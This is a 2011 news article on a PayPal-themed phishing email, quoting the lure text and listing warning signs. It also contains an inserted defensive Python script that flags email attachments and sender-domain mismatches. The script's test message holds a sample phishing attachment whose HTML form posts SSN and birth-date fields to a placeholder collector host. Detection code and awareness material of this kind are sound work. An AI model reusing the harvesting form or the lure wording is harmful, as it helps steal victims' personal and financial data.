How do you react to an email that informs you of illegal transactions made with your card?

Nov 7, 2011 11:08 GMT

Cybercriminals are using PayPal's name and reputation in the latest phishing expedition, which sets out to steal the accounts of internauts. The scam poses as a notification from the PayPal Account Review Team, informing the customer of a credit card issue.

According to Sophos, the message alerts potential victims to a credit card charge that was blocked by their system because it was unusual.

“An intrusion into your account has been detected which shows that someone tried to access your PayPal account without your permission. We have limited access to your account due to this problem. Moreover, we have sent you an attachment which contains all the necessary steps in order to restore your account access. Please download and open it in your browser,” reads the phish.

Once the attachment is opened, it reveals a form that replicates a PayPal page in which the user is urged to enter personal information such as name, date of birth, social security number, phone and other sensitive data that in the end will help the crooks get the contents of a bank account.

PayPal does send notification emails, but they never contain attachments, so this is a good thing to look out for when receiving such messages.

Also, take a good look at the email address of the sender. In many cases, such as this one, it gives the scam away.
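The two checks above (any attachment, and a sender address that does not match the brand the message claims) can be automated. The following is an added example, not code from Sophos or PayPal; the sample message, its addresses and URL are constructed, and treating `paypal.com` as the legitimate sender domain is an assumption.

```python
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser

# Constructed sample message; the addresses, boundary and form URL are made up.
SAMPLE = """\
From: "PayPal Account Review Team" <review@paypal-alerts.example>
Subject: Your account access has been limited
Content-Type: multipart/mixed; boundary="b1"

--b1

Please download the attachment and open it in your browser.
--b1
Content-Type: text/html; name="Restore.html"
Content-Disposition: attachment; filename="Restore.html"

<html><form action="http://collector.example/post">
<input name="ssn"><input name="dob" type="text"></form></html>
--b1--
"""

class FormFinder(HTMLParser):
    """Collects the start-tag names seen in an HTML attachment."""
    def __init__(self):
        super().__init__()
        self.tags = set()
    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)

def review(raw, brand="paypal", domain="paypal.com"):
    """Return warning flags; `domain` is the assumed legitimate sender domain."""
    msg = message_from_string(raw, policy=policy.default)
    name, addr = parseaddr(str(msg["From"]))
    host = addr.rpartition("@")[2].lower()
    flags = []
    claims = brand in name.lower() or brand in str(msg["Subject"]).lower()
    if claims and host != domain and not host.endswith("." + domain):
        flags.append("sender-domain-mismatch:" + host)
    for part in msg.iter_attachments():
        flags.append("attachment:" + (part.get_filename() or "unnamed"))
        if part.get_content_type() == "text/html":
            finder = FormFinder()
            finder.feed(part.get_content())
            if {"form", "input"} <= finder.tags:
                flags.append("html-form-attachment")
    return flags

print(review(SAMPLE))
```

A matching sender domain is not proof of legitimacy, since the From header can be forged; the flags are a reason to distrust a message, not a reason to trust one that raises none.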

The typos, the grammar errors and sometimes the poor design of a website can reveal the fact that an alert which seems to be coming from a legitimate company is actually a hoax.

Finally, to make sure you're protected against these malevolent operations, install decent security software. In most situations, the products offered by security vendors will quickly identify and contain these attempts.